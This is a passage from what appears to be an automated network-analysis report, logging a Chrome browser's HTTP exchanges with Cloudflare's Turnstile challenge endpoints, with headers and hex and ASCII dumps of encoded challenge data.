                                      Sec-Fetch-Dest: empty
                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ydlqt/0x4AAAAAAAUst_7UhbXCEgdQ/auto/normal
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-03-22 14:23:58 UTC16384OUTData Raw: 76 5f 38 36 38 36 64 37 39 36 39 66 66 33 38 63 38 64 3d 72 6c 6d 24 76 37 34 61 47 6a 6c 79 42 71 74 37 45 30 6c 71 6c 47 24 34 6c 36 31 37 36 68 36 24 50 42 34 46 4d 67 68 42 24 53 42 6e 52 68 69 37 68 6e 73 24 6e 46 44 4d 68 61 24 6e 6d 6e 67 52 67 68 4e 2d 6e 66 78 71 68 68 4e 68 55 24 37 38 71 56 30 37 50 71 34 58 68 71 6d 30 37 68 43 4b 24 34 45 68 68 2d 68 45 51 24 68 74 74 68 37 2d 68 66 30 79 53 62 24 75 52 53 64 50 73 37 55 45 62 57 34 35 73 68 6f 4b 68 68 6f 68 6f 24 34 61 78 4e 30 73 62 57 24 71 68 6a 2d 34 35 6a 68 68 78 73 66 6e 73 4b 67 67 34 6a 34 47 78 56 35 71 33 68 36 72 2d 46 36 75 69 68 65 71 48 79 34 47 34 68 24 34 5a 68 6e 72 57 47 73 71 67 5a 52 48 61 59 6d 34 72 6d 4c 57 34 51 62 62 7a 46 31 55 61 24 78 75 37 33 49 41 59 58 62 53
                                      Data Ascii: v_8686d7969ff38c8d=rlm$v74aGjlyBqt7E0lqlG$4l6176h6$PB4FMghB$SBnRhi7hns$nFDMha$nmngRghN-nfxqhhNhU$78qV07Pq4Xhqm07hCK$4Ehh-hEQ$htth7-hf0ySb$uRSdPs7UEbW45shoKhhoho$4axN0sbW$qhj-45jhhxsfnsKgg4j4GxV5q3h6r-F6uiheqHy4G4h$4ZhnrWGsqgZRHaYm4rmLW4QbbzF1Ua$xu73IAYXbS
                                      2024-03-22 14:23:58 UTC12277OUTData Raw: 34 68 68 34 56 51 24 53 65 4b 31 44 33 6b 4d 6d 47 68 51 47 67 43 71 48 5a 71 2b 35 55 66 6d 24 37 68 49 59 46 59 5a 52 24 49 24 37 68 6e 2d 68 55 68 57 24 6e 6d 73 49 68 67 47 37 36 68 55 24 37 42 37 58 68 71 24 50 47 6e 6e 61 64 68 68 2d 37 52 38 77 68 72 2d 34 55 68 74 68 51 47 4b 30 68 67 24 6e 24 50 57 68 62 24 34 47 6e 7a 68 54 75 71 49 70 52 68 65 24 37 52 37 6f 68 6d 68 34 73 34 45 6d 67 68 71 73 34 37 68 57 42 68 64 34 34 2d 44 24 6d 6c 68 4e 68 73 24 50 2d 6e 58 4d 6c 68 50 50 41 52 24 72 37 66 43 37 49 24 6b 24 50 47 37 43 30 4d 24 68 6d 37 49 24 66 68 6e 24 68 38 68 4f 62 72 2d 53 62 68 69 68 56 4d 4b 63 68 68 24 4e 6d 36 4b 68 6d 24 45 6d 71 30 34 4e 24 45 68 68 4f 34 56 68 30 72 73 57 34 2d 24 7a 6d 53 4b 34 74 24 7a 6d 6e 62 34 67 24 51 47
                                      Data Ascii: 4hh4VQ$SeK1D3kMmGhQGgCqHZq+5Ufm$7hIYFYZR$I$7hn-hUhW$nmsIhgG76hU$7B7Xhq$PGnnadhh-7R8whr-4UhthQGK0hg$n$PWhb$4GnzhTuqIpRhe$7R7ohmh4s4Emghqs47hWBhd44-D$mlhNhs$P-nXMlhPPAR$r7fC7I$k$PG7C0M$hm7I$fhn$h8hObr-SbhihVMKchh$Nm6Khm$Emq04N$EhhO4Vh0rsW4-$zmSK4t$zmnb4g$QG
                                      2024-03-22 14:23:58 UTC327INHTTP/1.1 200 OK
                                      Date: Fri, 22 Mar 2024 14:23:58 GMT
                                      Content-Type: text/plain; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      cf-chl-gen: b8/xQe9wAMYL8G5bCcHvdBUIC7nxd7jjsOdBNk5d6KCY1KCDBisNOwou4txGrqEN$aejcixMFx5FHzKn1A9BrzA==
                                      Server: cloudflare
                                      CF-RAY: 8686d7b6eab278ed-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-03-22 14:23:58 UTC1042INData Raw: 35 36 39 38 0d 0a 67 30 39 56 61 57 79 4f 63 5a 6c 79 61 33 47 62 65 32 53 65 67 36 52 6c 65 4a 75 6b 61 61 36 66 71 47 36 5a 73 6d 35 79 69 32 69 7a 72 49 78 77 69 4c 32 6e 73 59 69 74 6a 48 31 36 6f 72 79 51 6f 6e 71 42 6c 36 61 39 6c 71 47 68 71 35 75 77 7a 63 6a 56 79 39 61 32 6c 71 2f 4d 31 4d 57 7a 30 72 36 30 6e 38 32 67 6d 37 44 63 6f 39 33 53 31 2b 50 4c 78 39 2f 52 78 39 50 6e 34 73 66 71 34 72 6a 70 78 4f 72 62 7a 38 76 4a 38 37 67 41 31 4d 2f 46 31 4e 2f 37 77 41 66 6b 36 41 58 62 35 2b 73 46 33 65 58 75 44 66 66 77 34 39 6e 6c 37 66 6a 31 46 2f 58 37 36 64 37 35 49 50 55 48 38 4f 45 59 42 65 73 46 41 53 34 6b 4a 2f 48 6f 37 75 37 31 38 79 59 49 46 2f 45 6b 39 68 73 35 4c 78 6b 34 49 53 4c 38 52 78 2f 39 4f 6b 6b 34 4c 53 42 4b 48 79 45 4a 53
                                      Data Ascii: 5698g09VaWyOcZlya3Gbe2Seg6RleJukaa6fqG6Zsm5yi2izrIxwiL2nsYitjH16oryQonqBl6a9lqGhq5uwzcjVy9a2lq/M1MWz0r60n82gm7Dco93S1+PLx9/Rx9Pn4sfq4rjpxOrbz8vJ87gA1M/F1N/7wAfk6AXb5+sF3eXuDffw49nl7fj1F/X76d75IPUH8OEYBesFAS4kJ/Ho7u718yYIF/Ek9hs5Lxk4ISL8Rx/9Okk4LSBKHyEJS
                                      2024-03-22 14:23:58 UTC1369INData Raw: 6e 35 56 68 6b 36 47 43 71 59 53 45 6e 47 69 76 65 70 32 4e 6a 4b 53 41 69 61 53 53 70 72 6d 51 6c 33 4e 36 6b 70 75 4d 67 4a 70 36 6a 5a 71 63 75 4a 66 41 6b 70 6d 43 70 61 37 45 6d 6f 6a 4d 78 4d 75 69 6b 39 43 33 70 37 6d 31 74 5a 58 57 74 74 6a 50 6d 4c 33 41 6e 5a 37 41 78 4d 50 71 36 73 6a 46 75 2b 33 75 78 62 37 78 36 73 37 43 74 76 4c 74 79 76 6e 79 7a 38 6e 39 39 74 72 68 36 77 4f 2b 31 41 66 47 2f 66 50 58 43 65 4d 42 32 64 7a 77 33 75 4d 57 34 2b 66 6c 38 78 62 71 2b 41 6e 56 32 78 4d 66 39 65 77 61 44 67 48 66 4a 52 7a 38 35 2f 77 41 47 53 37 73 47 67 44 76 43 43 59 4b 4c 78 41 47 49 69 4d 46 46 6a 34 66 43 51 77 4e 45 54 51 6b 2b 79 62 35 41 2f 73 42 53 52 30 62 50 43 6b 4d 50 51 70 4f 4d 55 45 6d 54 68 52 49 58 45 56 55 46 54 64 54 51 6a 4a
                                      Data Ascii: n5Vhk6GCqYSEnGivep2NjKSAiaSSprmQl3N6kpuMgJp6jZqcuJfAkpmCpa7EmojMxMuik9C3p7m1tZXWttjPmL3AnZ7AxMPq6sjFu+3uxb7x6s7CtvLtyvnyz8n99trh6wO+1AfG/fPXCeMB2dzw3uMW4+fl8xbq+AnV2xMf9ewaDgHfJRz85/wAGS7sGgDvCCYKLxAGIiMFFj4fCQwNETQk+yb5A/sBSR0bPCkMPQpOMUEmThRIXEVUFTdTQjJ
                                      2024-03-22 14:23:58 UTC1369INData Raw: 6f 53 4b 67 32 4f 43 68 5a 69 67 66 61 4a 30 72 59 75 54 62 72 57 54 69 4c 4a 32 6c 70 32 53 6e 72 36 36 75 49 53 66 78 4d 47 71 74 61 4f 6f 7a 59 32 70 75 6f 36 66 6d 38 71 6f 70 70 62 4b 72 4b 57 6b 71 4e 4f 77 73 62 79 66 74 38 4c 63 75 37 76 59 78 4b 54 41 34 2b 44 57 36 39 36 37 33 65 72 6e 7a 74 44 6c 36 4f 6a 4a 37 50 66 38 74 51 44 37 79 50 45 41 2b 64 6e 37 32 41 54 67 39 76 55 4b 79 66 76 46 43 41 55 43 36 67 48 4b 35 68 54 33 36 66 62 56 2f 4e 62 63 38 2f 4c 37 36 67 48 79 48 66 6f 67 45 41 66 2b 46 66 6f 6b 41 66 6e 76 47 68 77 41 49 4f 34 67 4a 50 62 77 4e 50 49 71 4f 76 51 65 4f 42 6f 4b 49 69 4d 39 4a 68 46 44 4a 51 6f 71 49 45 59 61 43 41 68 4f 49 54 38 77 46 45 63 33 4a 6c 51 35 4a 52 6f 54 4f 56 55 37 57 31 64 42 4d 68 73 78 55 52 39 6a
                                      Data Ascii: oSKg2OChZigfaJ0rYuTbrWTiLJ2lp2Snr66uISfxMGqtaOozY2puo6fm8qoppbKrKWkqNOwsbyft8Lcu7vYxKTA4+DW69673ernztDl6OjJ7Pf8tQD7yPEA+dn72ATg9vUKyfvFCAUC6gHK5hT36fbV/Nbc8/L76gHyHfogEAf+FfokAfnvGhwAIO4gJPbwNPIqOvQeOBoKIiM9JhFDJQoqIEYaCAhOIT8wFEc3JlQ5JRoTOVU7W1dBMhsxUR9j
                                      2024-03-22 14:23:58 UTC1369INData Raw: 31 39 70 33 79 79 68 72 65 71 70 72 4e 31 76 49 39 76 6a 33 61 67 6b 70 4f 4d 6f 4a 4b 46 65 61 6d 47 69 4a 53 4c 7a 5a 72 4f 69 37 32 65 30 35 79 39 70 4c 43 77 74 71 6e 61 30 72 71 70 6e 36 79 34 72 75 4b 38 7a 62 50 41 77 4d 71 31 78 4f 4c 4b 75 75 37 4b 33 4d 6e 6b 7a 66 54 75 77 72 48 44 79 38 6a 56 30 66 6e 73 39 50 48 69 37 37 7a 46 2f 76 7a 38 31 39 6a 70 33 41 6e 4c 2b 73 34 4b 44 2f 33 55 45 68 41 42 43 64 67 61 46 68 50 37 2b 66 72 70 37 41 77 62 45 74 76 36 47 43 49 71 4b 42 63 6a 41 68 38 6e 4c 43 6b 4d 44 69 4d 6e 46 2f 48 78 4c 69 67 33 38 7a 6f 58 45 76 67 69 41 43 34 34 47 79 4d 5a 53 41 59 73 47 68 6f 6b 43 53 38 50 4a 46 49 72 4d 55 70 4c 4a 69 6c 61 58 43 55 54 57 6c 30 32 47 45 6f 77 4f 6a 63 66 54 7a 6c 56 4e 43 55 30 62 69 41 6d 4f
                                      Data Ascii: 19p3yyhreqprN1vI9vj3agkpOMoJKFeamGiJSLzZrOi72e05y9pLCwtqna0rqpn6y4ruK8zbPAwMq1xOLKuu7K3MnkzfTuwrHDy8jV0fns9PHi77zF/vz819jp3AnL+s4KD/3UEhABCdgaFhP7+frp7AwbEtv6GCIqKBcjAh8nLCkMDiMnF/HxLig38zoXEvgiAC44GyMZSAYsGhokCS8PJFIrMUpLJilaXCUTWl02GEowOjcfTzlVNCU0biAmO
                                      2024-03-22 14:23:58 UTC1369INData Raw: 33 6b 6d 75 47 6b 4a 42 37 6d 4c 71 2b 6a 35 47 76 74 37 43 57 77 4b 65 53 74 36 65 2b 6a 59 32 6b 72 63 43 65 6b 4d 6a 41 31 39 53 32 6f 74 53 32 72 74 65 70 7a 4c 47 33 73 75 47 7a 76 38 65 78 74 65 58 62 74 36 79 31 37 73 76 68 35 75 2f 62 76 71 66 75 74 62 47 33 39 63 37 39 2f 66 53 35 31 50 50 58 38 75 48 37 35 64 2f 37 36 41 58 55 31 38 51 47 2b 78 48 64 42 2f 33 38 41 41 73 50 39 75 34 50 45 73 37 2b 45 2f 77 4b 44 79 4c 77 35 50 51 63 46 66 76 31 41 42 6f 57 34 77 50 35 42 2b 77 42 4e 65 6f 45 38 53 6b 4f 45 44 66 7a 4a 53 59 74 38 51 73 4d 4d 68 49 46 41 44 59 58 4a 78 55 35 54 52 63 6b 4f 55 34 4a 54 42 77 64 53 43 59 6a 57 43 45 78 4b 55 70 58 54 43 74 66 50 55 41 78 54 30 5a 54 50 32 4d 62 4f 56 35 6b 57 55 35 73 50 53 39 72 58 57 6c 6e 53 6b
                                      Data Ascii: 3kmuGkJB7mLq+j5Gvt7CWwKeSt6e+jY2krcCekMjA19S2otS2rtepzLG3suGzv8exteXbt6y17svh5u/bvqfutbG39c79/fS51PPX8uH75d/76AXU18QG+xHdB/38AAsP9u4PEs7+E/wKDyLw5PQcFfv1ABoW4wP5B+wBNeoE8SkOEDfzJSYt8QsMMhIFADYXJxU5TRckOU4JTBwdSCYjWCExKUpXTCtfPUAxT0ZTP2MbOV5kWU5sPS9rXWlnSk
                                      2024-03-22 14:23:58 UTC1369INData Raw: 74 4c 65 77 6c 72 4f 55 6d 5a 6d 35 6d 62 69 63 75 71 71 34 6f 38 47 33 76 34 76 43 6a 36 61 75 73 63 36 68 72 72 71 6e 6d 4e 44 47 72 62 58 4a 31 4c 43 39 77 63 36 31 79 64 6e 4a 33 75 7a 46 7a 4b 76 46 79 4e 44 54 34 4f 58 75 78 37 48 4e 37 4c 4c 38 32 66 62 50 2f 4e 4c 74 76 73 48 69 2f 74 62 30 33 50 77 44 32 65 4d 42 33 42 44 37 38 39 38 55 43 2f 66 34 45 41 33 35 2b 51 7a 79 2f 75 76 64 2f 50 33 62 47 66 51 64 49 42 6e 2b 48 50 77 43 41 69 49 43 49 51 55 6a 45 79 45 4d 4b 69 41 6f 38 79 76 33 44 78 63 61 4e 77 6f 73 49 68 49 69 50 44 73 38 4f 45 41 72 50 67 55 67 51 51 63 52 4d 30 49 52 4a 30 78 49 4f 46 6b 31 4e 69 30 33 56 45 38 62 56 42 78 55 57 30 4e 63 55 69 4e 6c 52 46 31 49 4b 6b 5a 4f 50 58 42 6b 55 45 4a 4f 61 31 4a 47 53 6d 56 76 63 46 70
                                      Data Ascii: tLewlrOUmZm5mbicuqq4o8G3v4vCj6ausc6hrrqnmNDGrbXJ1LC9wc61ydnJ3uzFzKvFyNDT4OXux7HN7LL82fbP/NLtvsHi/tb03PwD2eMB3BD7898UC/f4EA35+Qzy/uvd/P3bGfQdIBn+HPwCAiICIQUjEyEMKiAo8yv3DxcaNwosIhIiPDs8OEArPgUgQQcRM0IRJ0xIOFk1Ni03VE8bVBxUW0NcUiNlRF1IKkZOPXBkUEJOa1JGSmVvcFp
                                      2024-03-22 14:23:58 UTC1369INData Raw: 4c 65 6e 70 49 53 2f 73 70 69 45 77 4b 6a 44 72 63 4f 78 73 61 48 49 74 63 76 44 79 72 76 50 76 61 2b 2f 76 4a 6a 4e 77 37 47 39 31 38 66 46 79 64 6a 4c 78 2b 50 6a 7a 38 33 46 34 74 50 6e 34 2b 66 58 73 4d 58 74 31 4f 2f 72 37 64 37 64 32 65 7a 69 34 64 33 35 35 38 44 64 32 2f 4c 5a 34 51 50 76 42 4f 48 39 38 76 44 4d 44 50 66 7a 45 42 44 35 45 41 77 53 41 4e 67 43 47 41 4d 59 41 68 6b 42 48 42 51 67 43 77 6e 6b 48 78 44 6f 45 68 34 55 4b 42 59 49 47 50 41 6b 4b 68 73 61 45 6a 41 66 4e 42 59 7a 4a 43 41 38 4f 79 63 6d 4a 6a 77 73 51 43 59 39 4c 6b 51 75 51 79 31 49 51 45 67 34 54 44 70 50 4f 7a 70 4d 53 6b 42 55 4d 6a 52 44 57 45 5a 52 52 31 77 32 57 30 78 4a 4a 57 4a 4f 54 47 68 6f 55 79 31 43 5a 6c 39 47 5a 47 39 62 63 45 35 51 58 33 52 73 64 6d 74 53
                                      Data Ascii: LenpIS/spiEwKjDrcOxsaHItcvDyrvPva+/vJjNw7G918fFydjLx+Pjz83F4tPn4+fXsMXt1O/r7d7d2ezi4d3558Dd2/LZ4QPvBOH98vDMDPfzEBD5EAwSANgCGAMYAhkBHBQgCwnkHxDoEh4UKBYIGPAkKhsaEjAfNBYzJCA8OycmJjwsQCY9LkQuQy1IQEg4TDpPOzpMSkBUMjRDWEZRR1w2W0xJJWJOTGhoUy1CZl9GZG9bcE5QX3RsdmtS
                                      2024-03-22 14:23:58 UTC1369INData Raw: 44 4c 79 4b 75 67 7a 39 4b 74 72 38 79 6f 77 35 48 48 6c 62 57 33 31 4d 76 4c 6d 63 2b 64 76 62 2f 62 34 38 54 47 30 37 76 55 75 4f 44 4d 79 65 53 35 77 39 71 2f 72 4c 54 70 72 72 54 33 31 4f 2f 5a 38 74 6e 65 41 65 44 64 2b 4d 33 58 37 74 58 33 33 75 51 41 42 4f 34 44 32 38 77 51 37 41 6e 6c 38 51 48 32 47 4f 38 47 30 2f 55 65 44 4f 34 4d 2f 51 30 41 33 50 6f 42 48 66 45 4c 46 41 67 6b 4b 51 30 4f 37 41 51 63 4a 79 67 33 45 53 30 4f 47 79 38 49 2b 50 51 5a 4e 41 45 58 48 54 6b 65 4a 7a 45 6b 51 45 6b 70 4b 78 34 67 4f 55 4e 45 44 43 31 4a 51 44 64 4c 4a 42 56 58 4e 56 42 55 4d 31 4e 49 54 42 68 45 57 56 68 48 57 7a 51 6c 4a 45 56 6b 57 43 52 51 5a 57 52 48 54 57 78 67 4c 46 68 58 62 46 74 76 53 44 6c 2b 57 58 68 73 4f 47 52 6a 65 46 74 68 67 48 52 41 63
                                      Data Ascii: DLyKugz9Ktr8yow5HHlbW31MvLmc+dvb/b48TG07vUuODMyeS5w9q/rLTprrT31O/Z8tneAeDd+M3X7tX33uQABO4D28wQ7Anl8QH2GO8G0/UeDO4M/Q0A3PoBHfELFAgkKQ0O7AQcJyg3ES0OGy8I+PQZNAEXHTkeJzEkQEkpKx4gOUNEDC1JQDdLJBVXNVBUM1NITBhEWVhHWzQlJEVkWCRQZWRHTWxgLFhXbFtvSDl+WXhsOGRjeFthgHRAc


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      18192.168.2.449767104.17.2.1844433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-03-22 14:23:58 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1866956230:1711114023:qi2FWv_Rg0fiI6pnc0EZrR7oXCzTXz1FUAULF1OGhso/8686d7969ff38c8d/99cb5747b72fd32 HTTP/1.1
                                      Host: challenges.cloudflare.com
                                      Connection: keep-alive
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      Accept: */*
                                      Sec-Fetch-Site: none
                                      Sec-Fetch-Mode: cors
                                      Sec-Fetch-Dest: empty
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-03-22 14:23:59 UTC386INHTTP/1.1 400 Bad Request
                                      Date: Fri, 22 Mar 2024 14:23:59 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                      cf-chl-out: jIWFTiR1yAQeRzfM4WNYrA==$rjRcJzm7dv6HF5hlZ3qiZg==
                                      Server: cloudflare
                                      CF-RAY: 8686d7ba9df419a1-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-03-22 14:23:59 UTC12INData Raw: 37 0d 0a 69 6e 76 61 6c 69 64 0d 0a
                                      Data Ascii: 7invalid
                                      2024-03-22 14:23:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      19192.168.2.449768104.17.3.1844433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-03-22 14:24:08 UTC917OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1866956230:1711114023:qi2FWv_Rg0fiI6pnc0EZrR7oXCzTXz1FUAULF1OGhso/8686d7969ff38c8d/99cb5747b72fd32 HTTP/1.1
                                      Host: challenges.cloudflare.com
                                      Connection: keep-alive
                                      Content-Length: 31824
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      Content-type: application/x-www-form-urlencoded
                                      sec-ch-ua-mobile: ?0
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      CF-Challenge: 99cb5747b72fd32
                                      sec-ch-ua-platform: "Windows"
                                      Accept: */*
                                      Origin: https://challenges.cloudflare.com
                                      Sec-Fetch-Site: same-origin
                                      Sec-Fetch-Mode: cors
                                      Sec-Fetch-Dest: empty
                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ydlqt/0x4AAAAAAAUst_7UhbXCEgdQ/auto/normal
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-03-22 14:24:08 UTC16384OUTData Raw: 76 5f 38 36 38 36 64 37 39 36 39 66 66 33 38 63 38 64 3d 72 6c 6d 24 76 37 34 61 47 6a 6c 79 42 71 74 37 45 30 6c 71 6c 47 24 34 6c 36 31 37 36 68 36 24 50 42 34 46 4d 67 68 42 24 53 42 6e 52 68 69 37 68 6e 73 24 6e 46 44 4d 68 61 24 6e 6d 6e 67 52 67 68 4e 2d 6e 66 78 71 68 68 4e 68 55 24 37 38 71 56 30 37 50 71 34 58 68 71 6d 30 37 68 43 4b 24 34 45 68 68 2d 68 45 51 24 68 74 74 68 37 2d 68 66 30 79 53 62 24 75 52 53 64 50 73 37 55 45 62 57 34 35 73 68 6f 4b 68 68 6f 68 6f 24 34 61 78 4e 30 73 62 57 24 71 68 6a 2d 34 35 6a 68 68 78 73 66 6e 73 4b 67 67 34 6a 34 47 78 56 35 71 33 68 36 72 2d 46 36 75 69 68 65 71 48 79 34 47 34 68 24 34 5a 68 6e 72 57 47 73 71 67 5a 52 48 61 59 6d 34 72 6d 4c 57 34 51 62 62 7a 46 31 55 61 24 78 75 37 33 49 41 59 58 62 53
                                      Data Ascii: v_8686d7969ff38c8d=rlm$v74aGjlyBqt7E0lqlG$4l6176h6$PB4FMghB$SBnRhi7hns$nFDMha$nmngRghN-nfxqhhNhU$78qV07Pq4Xhqm07hCK$4Ehh-hEQ$htth7-hf0ySb$uRSdPs7UEbW45shoKhhoho$4axN0sbW$qhj-45jhhxsfnsKgg4j4GxV5q3h6r-F6uiheqHy4G4h$4ZhnrWGsqgZRHaYm4rmLW4QbbzF1Ua$xu73IAYXbS
                                      2024-03-22 14:24:08 UTC15440OUTData Raw: 34 68 68 34 56 51 24 53 65 4b 31 44 33 6b 4d 6d 47 68 51 47 67 43 71 48 5a 71 2b 35 55 66 6d 24 37 68 49 59 46 59 5a 52 24 49 24 37 68 6e 2d 68 55 68 57 24 6e 6d 73 49 68 67 47 37 36 68 55 24 37 42 37 58 68 71 24 50 47 6e 6e 61 64 68 68 2d 37 52 38 77 68 72 2d 34 55 68 74 68 51 47 4b 30 68 67 24 6e 24 50 57 68 62 24 34 47 6e 7a 68 54 75 71 49 70 52 68 65 24 37 52 37 6f 68 6d 68 34 73 34 45 6d 67 68 71 73 34 37 68 57 42 68 64 34 34 2d 44 24 6d 6c 68 4e 68 73 24 50 2d 6e 58 4d 6c 68 50 50 41 52 24 72 37 66 43 37 49 24 6b 24 50 47 37 43 30 4d 24 68 6d 37 49 24 66 68 6e 24 68 38 68 4f 62 72 2d 53 62 68 69 68 56 4d 4b 63 68 68 24 4e 6d 36 4b 68 6d 24 45 6d 71 30 34 4e 24 45 68 68 4f 34 56 68 30 72 73 57 34 2d 24 7a 6d 53 4b 34 74 24 7a 6d 6e 62 34 67 24 51 47
                                      Data Ascii: 4hh4VQ$SeK1D3kMmGhQGgCqHZq+5Ufm$7hIYFYZR$I$7hn-hUhW$nmsIhgG76hU$7B7Xhq$PGnnadhh-7R8whr-4UhthQGK0hg$n$PWhb$4GnzhTuqIpRhe$7R7ohmh4s4Emghqs47hWBhd44-D$mlhNhs$P-nXMlhPPAR$r7fC7I$k$PG7C0M$hm7I$fhn$h8hObr-SbhihVMKchh$Nm6Khm$Emq04N$EhhO4Vh0rsW4-$zmSK4t$zmnb4g$QG
                                      2024-03-22 14:24:08 UTC1359INHTTP/1.1 200 OK
                                      Date: Fri, 22 Mar 2024 14:24:08 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      cf-chl-out: fXruMqCTRAdp2SQJXAMU43GsMTOe/mYytXveH6/krFm1B5oMc1LoJAQOrHm13Uvb1pcmtMyLjZ5qMq0XLFEhLfy1eejvEbCkrD/wkVAvjesiGKeqw3Ru9X+8r/SoQz2o$C+m2TCdRV5lsY7xMKHRKAw==
                                      cf-chl-out-s: 83yDUT/fugatfy/HO08Bym4pLQVY4g3raQ3FJ+66W9gP7QGQWw/kMDDmySHD2saBYXSmjx09uQ2C/VaC95myhXxvHz7KckcrRdOLPbvlaNU+GNM8PS459zPNezBiKo8iXdowpsy5AmCEe+JggzqYaY1teywjc7Yvruu4fSOoJj64wzE0E3i5Qjv83DpLDbmxraVvDr3axK/UB13iobsq4/T3hCzDV5QMx/NNCUQH31HJGpmRfkIXE67dXmZmwKARwxTD0+21Mb4Ue1Bu0JE9uWPYHbCGXKngRvKgtTXg7QlAGXk44n3donBQ85CJTNAKC+8AJcgf0Hug80tsX287asgOZBHhR+c19DH4VrHkF6ptTq3e0Lk1hmehZy0QqJaz3In2QDqXb70RcQTAYSWNRgkURbQsS+H8pp2EQe+zc/LrxJo0cuG6YQN93iZg9gPQB1jSg3IZ8Jm4HEbax0HnM4Z+rbIilod8AhBUzpfZ4rSvvUqhqQLrp6vonO12ka5Wg3obArVY4Pff01xTZA6/4kQ0/TFXFa8q2masWV0Jz6+fq0CVb08Wuy4Pue9w6ngZBUY7L9eRwqzFsX5CV54UZscyeRMMNFHt/vTzFB7v/2aIAeeC5fi1SLMjciyEt7p62wGyKnvAhRn1pDr7L7umgsbMfFGlnDQgVzBA69DL7WS4sT21p9V7czSLGC9JtbhUoEshjmMxz6YhjcSC6I0ujoaKxYXHVim3RK20F2eyOFFP4AjIPsLLlrAYgl/vU1/k9A1cwcKnUlg9YWntE4O0eUC1M4Jv3cJBWk4b/mMV8svpDnKuuquvZgwiQhqtOFaW8hXXnkyaGt2zObA49mcPMUX5pxU4LH7Km4pGYn+1LVpQqeLSEntWr8YFfHbyKee7fHfjixTZi/vPB2Og3CBwQewyDRceiRAXX5PVKNQgG6fW+W4N4EfnqklP+a/xWQvG$OWOPLaCeYD0WIQENf5jY9w==
                                      Server: cloudflare
                                      CF-RAY: 8686d7f47be9c32e-EWR
                                      2024-03-22 14:24:08 UTC32INData Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                      Data Ascii: alt-svc: h3=":443"; ma=86400
                                      2024-03-22 14:24:08 UTC1347INData Raw: 64 66 30 0d 0a 67 30 39 56 61 57 79 4f 63 5a 6c 79 61 33 47 62 65 32 53 65 67 36 52 6b 5a 6c 79 6b 6c 6e 65 6c 71 6f 4f 6f 6f 6d 6d 7a 6e 32 35 74 6b 61 4a 31 68 33 4b 4d 65 63 43 30 75 49 79 65 65 70 48 48 70 6f 44 48 79 36 71 46 72 72 36 6a 69 61 61 6f 72 63 32 6d 30 4d 36 57 32 63 76 4d 76 61 2b 35 30 63 69 79 33 64 58 68 33 4f 66 63 70 71 62 4c 33 38 7a 64 75 2b 43 39 71 4c 7a 71 36 65 4c 56 34 65 33 30 73 4f 6e 62 2b 39 44 65 32 73 44 59 31 72 76 5a 2f 64 76 54 79 4d 62 43 2b 2f 76 64 37 66 37 2b 45 74 73 46 36 42 4c 55 42 75 67 55 34 2f 54 76 42 78 48 61 31 78 49 52 47 76 72 63 46 43 44 32 49 68 6e 6d 37 53 6f 59 36 53 54 70 48 51 73 33 38 67 49 35 41 75 77 53 4c 68 4d 48 50 67 34 33 41 6b 45 61 47 43 63 67 4d 7a 4e 48 4e 55 49 4e 49 53 35 52 45 53
                                      Data Ascii: df0g09VaWyOcZlya3Gbe2Seg6RkZlyklnelqoOoommzn25tkaJ1h3KMecC0uIyeepHHpoDHy6qFrr6jiaaorc2m0M6W2cvMva+50ciy3dXh3OfcpqbL38zdu+C9qLzq6eLV4e30sOnb+9De2sDY1rvZ/dvTyMbC+/vd7f7+EtsF6BLUBugU4/TvBxHa1xIRGvrcFCD2Ihnm7SoY6STpHQs38gI5AuwSLhMHPg43AkEaGCcgMzNHNUINIS5RES
                                      2024-03-22 14:24:08 UTC1369INData Raw: 68 6f 5a 6b 5a 71 69 58 68 34 62 33 4f 44 63 34 6d 4b 68 56 4b 5a 6b 48 5a 38 65 33 36 4b 67 5a 56 79 6d 6f 47 43 6f 35 32 45 6f 5a 71 58 65 58 64 2b 69 71 61 67 72 4b 57 46 62 70 61 66 73 4b 57 47 73 34 68 36 74 4c 5a 37 77 59 71 30 6f 6e 36 4f 75 4b 69 61 78 62 53 73 66 37 2b 2f 69 64 43 4c 76 73 6a 56 71 73 44 41 79 61 6a 50 72 4b 75 76 30 39 65 2f 72 74 6d 62 35 62 54 52 6f 74 48 65 32 37 36 37 76 74 6a 6e 7a 2b 54 4f 36 71 37 6a 35 64 6a 43 38 2f 43 33 31 74 44 75 34 50 7a 55 2b 76 6a 35 32 76 76 39 77 74 34 44 36 67 48 4a 41 65 45 4b 32 77 72 4d 33 75 30 41 41 65 50 72 42 78 4c 6e 2f 41 38 59 46 66 67 4f 33 75 37 38 42 51 59 4c 41 42 58 6f 48 68 63 6d 35 79 6f 45 49 67 58 6e 4b 79 